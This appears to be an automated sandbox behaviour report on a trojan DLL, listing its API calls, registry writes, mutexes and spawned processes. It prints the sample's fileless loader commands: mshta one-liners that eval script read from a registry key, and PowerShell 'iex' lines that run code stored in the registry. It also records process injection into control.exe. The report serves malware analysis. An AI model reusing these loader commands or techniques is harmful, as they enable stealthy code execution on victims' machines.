Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10001996 GetProcAddress,NtCreateSection,memset,	0_2_10001996
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10001A44 NtMapViewOfSection,	0_2_10001A44
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_100023A5 NtQueryVirtualMemory,	0_2_100023A5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_0463DDC5 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	3_2_0463DDC5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_0464104F RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,	3_2_0464104F
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_046318AC NtQueryInformationProcess,	3_2_046318AC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_046391A2 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,	3_2_046391A2
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04623D0F NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,	3_2_04623D0F
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_0462E5E9 NtQuerySystemInformation,RtlNtStatusToDosError,	3_2_0462E5E9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_0462DE4B memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,	3_2_0462DE4B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_0462FE2C memset,NtWow64QueryInformationProcess64,GetProcAddress,	3_2_0462FE2C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_0462981E NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,	3_2_0462981E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_046259A0 NtWriteVirtualMemory,VirtualProtectEx,RtlNtStatusToDosError,SetLastError,	3_2_046259A0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_0462F19E NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,	3_2_0462F19E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04625210 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,	3_2_04625210
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04622AB1 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,	3_2_04622AB1
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04624358 memset,NtQueryInformationProcess,	3_2_04624358
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_0463B338 NtGetContextThread,RtlNtStatusToDosError,	3_2_0463B338
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_0462DB10 NtWow64ReadVirtualMemory64,GetProcAddress,	3_2_0462DB10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_04E95A27 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	7_2_04E95A27
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_04E96604 GetProcAddress,NtCreateSection,memset,	7_2_04E96604
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_04E94E06 NtMapViewOfSection,	7_2_04E94E06
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_04E9B1A5 NtQueryVirtualMemory,	7_2_04E9B1A5
Source: C:\Windows\System32\control.exe	Code function: 50_2_001B1044 NtWriteVirtualMemory,	50_2_001B1044
Source: C:\Windows\System32\control.exe	Code function: 50_2_001A846C NtAllocateVirtualMemory,	50_2_001A846C
Source: C:\Windows\System32\control.exe	Code function: 50_2_0019F8C8 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification,	50_2_0019F8C8
Source: C:\Windows\System32\control.exe	Code function: 50_2_001B0CC0 NtCreateSection,	50_2_001B0CC0
Source: C:\Windows\System32\control.exe	Code function: 50_2_001A491C NtSetContextThread,NtUnmapViewOfSection,NtClose,	50_2_001A491C
Source: C:\Windows\System32\control.exe	Code function: 50_2_001B6218 NtMapViewOfSection,	50_2_001B6218
Source: C:\Windows\System32\control.exe	Code function: 50_2_001AB27C NtQueryInformationToken,NtQueryInformationToken,NtClose,	50_2_001AB27C
Source: C:\Windows\System32\control.exe	Code function: 50_2_0019B3A8 NtQueryInformationProcess,	50_2_0019B3A8
Source: C:\Windows\System32\control.exe	Code function: 50_2_0019FBEC NtReadVirtualMemory,	50_2_0019FBEC
Source: C:\Windows\System32\control.exe	Code function: 50_2_001CB002 NtProtectVirtualMemory,NtProtectVirtualMemory,	50_2_001CB002

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 3_2_046326C2 CreateProcessAsUserW,

3_2_046326C2

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10002184	0_2_10002184
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04642D9C	3_2_04642D9C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04626F3A	3_2_04626F3A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_0462D2AE	3_2_0462D2AE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_04E93EE1	7_2_04E93EE1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_04E9888E	7_2_04E9888E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_04E9AF80	7_2_04E9AF80
Source: C:\Windows\System32\control.exe	Code function: 50_2_001A491C	50_2_001A491C
Source: C:\Windows\System32\control.exe	Code function: 50_2_0019775C	50_2_0019775C
Source: C:\Windows\System32\control.exe	Code function: 50_2_001A1388	50_2_001A1388
Source: C:\Windows\System32\control.exe	Code function: 50_2_00193034	50_2_00193034
Source: C:\Windows\System32\control.exe	Code function: 50_2_001AD834	50_2_001AD834
Source: C:\Windows\System32\control.exe	Code function: 50_2_001B1834	50_2_001B1834
Source: C:\Windows\System32\control.exe	Code function: 50_2_001AEC58	50_2_001AEC58
Source: C:\Windows\System32\control.exe	Code function: 50_2_001910B0	50_2_001910B0
Source: C:\Windows\System32\control.exe	Code function: 50_2_001A58B4	50_2_001A58B4
Source: C:\Windows\System32\control.exe	Code function: 50_2_001A54C8	50_2_001A54C8
Source: C:\Windows\System32\control.exe	Code function: 50_2_001A04C4	50_2_001A04C4
Source: C:\Windows\System32\control.exe	Code function: 50_2_001B10E0	50_2_001B10E0
Source: C:\Windows\System32\control.exe	Code function: 50_2_001BAD08	50_2_001BAD08
Source: C:\Windows\System32\control.exe	Code function: 50_2_0019E158	50_2_0019E158
Source: C:\Windows\System32\control.exe	Code function: 50_2_001A4150	50_2_001A4150
Source: C:\Windows\System32\control.exe	Code function: 50_2_00195998	50_2_00195998
Source: C:\Windows\System32\control.exe	Code function: 50_2_0019D1B8	50_2_0019D1B8
Source: C:\Windows\System32\control.exe	Code function: 50_2_001B1DA8	50_2_001B1DA8
Source: C:\Windows\System32\control.exe	Code function: 50_2_001A79AC	50_2_001A79AC
Source: C:\Windows\System32\control.exe	Code function: 50_2_001B95FC	50_2_001B95FC
Source: C:\Windows\System32\control.exe	Code function: 50_2_0019AE04	50_2_0019AE04
Source: C:\Windows\System32\control.exe	Code function: 50_2_001AB668	50_2_001AB668
Source: C:\Windows\System32\control.exe	Code function: 50_2_001A2A88	50_2_001A2A88
Source: C:\Windows\System32\control.exe	Code function: 50_2_0019BA8C	50_2_0019BA8C
Source: C:\Windows\System32\control.exe	Code function: 50_2_001962DC	50_2_001962DC
Source: C:\Windows\System32\control.exe	Code function: 50_2_001B52C8	50_2_001B52C8
Source: C:\Windows\System32\control.exe	Code function: 50_2_001B86FC	50_2_001B86FC
Source: C:\Windows\System32\control.exe	Code function: 50_2_001B5B1C	50_2_001B5B1C
Source: C:\Windows\System32\control.exe	Code function: 50_2_001B9B14	50_2_001B9B14
Source: C:\Windows\System32\control.exe	Code function: 50_2_001B8B50	50_2_001B8B50
Source: C:\Windows\System32\control.exe	Code function: 50_2_0019EBBC	50_2_0019EBBC
Source: C:\Windows\System32\control.exe	Code function: 50_2_001ACFB4	50_2_001ACFB4
Source: C:\Windows\System32\control.exe	Code function: 50_2_0019FFE8	50_2_0019FFE8

Source: rzslcw3n.dll.44.dr

Static PE information: No import functions for PE file found

Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Source: C:\Windows\SysWOW64\regsvr32.exe

Section loaded: sfc.dll

Jump to behavior

Source: 2790000.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: 2790000.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.evad.winDLL@82/256@56/19

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 3_2_04632517 CloseHandle,CloseHandle,CreateToolhelp32Snapshot,GetModuleHandleA,GetProcAddress,Thread32First,OpenThread,QueueUserAPC,CloseHandle,Thread32Next,CloseHandle,

3_2_04632517

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{D216EB03-DE55-11EB-90EB-ECF4BBEA1588}.dat

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	Mutant created: \Sessions\1\BaseNamedObjects\{80E0D293-DF59-B25D-69B4-8306AD28679A}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4596:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5020:120:WilError_01
Source: C:\Windows\System32\control.exe	Mutant created: \Sessions\1\BaseNamedObjects\{3C30E525-6B4E-CE90-D530-CFE2D9647336}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5960:120:WilError_01

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Temp\~DF7279FB1455334C84.TMP

Jump to behavior

Source: 2790000.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\internet explorer\iexplore.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\2790000.dll',#1

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\2790000.dll'
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\2790000.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\2790000.dll
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\2790000.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\2790000.dll,DllRegisterServer
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17426 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17430 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:82966 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:82970 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:82982 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17460 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17468 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17472 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17480 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:83036 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17500 /prefetch:2
Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Vo0g='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Vo0g).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>'
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:83052 /prefetch:2
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17514 /prefetch:2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17520 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:279558 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:83084 /prefetch:2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\rzslcw3n\rzslcw3n.cmdline'
Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>N4ot='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(N4ot).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESD796.tmp' 'c:\Users\user\AppData\Local\Temp\rzslcw3n\CSCA64EAED44D2B4776864E5EDA5D4E8B86.TMP'
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Nohx='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Nohx).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>'
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:83090 /prefetch:2
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\rpyoew2f\rpyoew2f.cmdline'
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17546 /prefetch:2
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES30B.tmp' 'c:\Users\user\AppData\Local\Temp\rpyoew2f\CSCDF3AABDF3FB34DF1A43A4F7FD45C9671.TMP'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xwrbq4ie\xwrbq4ie.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\pkkmtuzt\pkkmtuzt.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES1395.tmp' 'c:\Users\user\AppData\Local\Temp\xwrbq4ie\CSCC07B09CA405E4901BCF4DD90291B57CA.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES1D78.tmp' 'c:\Users\user\AppData\Local\Temp\pkkmtuzt\CSC7DF2BB886B1A41BB8B841DD3834E0B8.TMP'
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\2790000.dll',#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\2790000.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\2790000.dll,DllRegisterServer	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\2790000.dll',#1	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17410 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17426 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17430 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:82966 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:82970 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:82982 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17460 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17468 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17472 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17480 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:83036 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17500 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:83052 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17514 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17520 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:279558 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:83084 /prefetch:2	Jump to behavior
